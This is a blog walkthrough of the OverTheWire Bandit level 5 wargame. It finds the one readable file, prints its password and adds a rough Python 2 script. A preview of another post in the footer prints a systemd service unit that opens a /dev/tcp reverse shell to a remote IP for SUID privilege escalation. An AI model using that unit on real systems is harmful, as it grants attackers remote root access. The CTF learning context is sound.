Skip to main content

Over the Wire - Bandit 5

Bandit 5

 Objectives

 The password for the next level is stored in the only human-readable file in the inheredirectory. Tip: if your terminal is messed up, try the “reset” command.
Solution

 Ok

so after we login we see a familiar inhere directory listed in the home directory for bandit 4 lets see whats in there

bandit4@bandit:~$ cd ./inhere/ && ls -ltotal 40-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file00-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file01-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file02-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file03-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file04-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file05-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file06-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file07-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file08-rw-r----- 1 bandit5 bandit4 33 Oct 16  2018 -file09


we see 10 files named in the convention -file0*  let's see what type of files they are

bandit4@bandit:~/inhere$ file ./-file0*./-file00: data./-file01: data./-file02: data./-file03: data./-file04: data./-file05: data./-file06: data./-file07: ASCII text./-file08: data./-file09: data


we also could have checked the mime types here

bandit4@bandit:~/inhere$ file --mime-type ./-file0*./-file00: application/octet-stream./-file01: application/octet-stream./-file02: application/octet-stream./-file03: application/octet-stream./-file04: application/octet-stream./-file05: application/octet-stream./-file06: application/octet-stream./-file07: text/plain./-file08: application/octet-stream./-file09: application/octet-stream


Either way we see that -file07 is a text ascii file. Give the the requirement that the password is in the only human readable file I think we can assume from here that -file07 is where our password is

bandit4@bandit:~/inhere$ cat ./-file07koReBOKuIDDepwhWk7jZC0RTdopnAYKh


And there it is our password for the next level


now lets do it with python

I spent hours trying to script out a file that would read the mime types of the files and then put them through and while state statement with an if inside to parse our just file07 but I at this point in my python journey just couldn't get there especially since I couldn't use the magic library on the overthewire server...
so in the in the end I just made this script that gets all the files in the directory and prints the content out to the  screen... its ugly but its was the best I could do right now

import os

filesvar = os.listdir(os.curdir)count = 0

while count <=len(filesvar): print filesvar[count] f = open(filesvar[count]) f.read()
 count +=1

bandit4@bandit:~/inhere$ pythonPython 2.7.13 (default, Sep 26 2018, 18:42:22)[GCC 6.3.0 20170516] on linux2Type "help", "copyright", "credits" or "license" for more information.>>> import os>>>>>>>>> filesvar = os.listdir(os.curdir)>>> count = 0>>>>>>>>> while count <=len(filesvar):...  print filesvar[count]...  f = open(filesvar[count])...  f.read()
...  count +=1...-file09'N\xbb{\xe0\xea\xbdY\xb3d\x144\xd6\xd4\xf5\x93\x1a]3\xae\xa9\x00\xdc\xdf\xc4\x179(\xc2\nQ\x96\x88\xad'-file06'\x9c\x05\xa9@\xb9%@\xe4\xda\xcd\x18ZP*E\x02\x02\xa6\xf31\xc3V\x83\x99\x97\xcc\xab*\xa6\xae\x89\x19\xdb'-file01'\xbb\x98\xd8U"7\xa2w\x19\xe2\xda\xdeH\x81\xab\xc3\xaa\xd0Q\x90\xf4\x8d\x82(\x91\x04\xec\xc4#\xa6\xad\xd2\x00'-file02'\xe9\x1eT\x1f\x9ev\x9a\x8d(\xf1\xd6\xb4\xb2\x82\x9b\x83\xecA*\x95\n2\x15J\x89\xc5\x9e\xd8\x87_\xb5y7'-file05'+\x14\x03\xac\xbbp\x03\x10m\x1e\x01\xff\xb8\x87;\x11\xdd\xec:D\x98\xf8^\x9a\xba@\x00\xe2gl\xddQ\xeb'-file03'\xe9\x96.A\x88\xe9u\x9e\xfc#\xe7\xd5\x1c\xc5w$N?c\x83-\x9d\xbbDb3\x14\x8b\xe0=\xf6\x02\xf8'-file08"\x10\x1dFPn\xa1\x0b'\x8bU\xf4\x07\xb9\xe2M\xb7\x97/u\x0cXS\n\x8amu\xb2z\xf0\xc7\xc0\xd1\x85"-file07'koReBOKuIDDepwhWk7jZC0RTdopnAYKh\n'-file04'\x8e=<\xc2\x08\x8bW\xde\x07\xf5\xd6\x10\x00\x87\xa3ht\x84\x07Z\x93\x93!\x18\x10\x95\xdb{\x19\x96U\x0b\xf8'-file00'pC\xb5\xc4\r\xe8\xf7\xac\x82\xa8\xb0\x9e\x80\x13\xf4\xa6~%\t\x13C[\xa7\xea\xb1\xb1>\xfa\xd0\x04| \x94'







Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more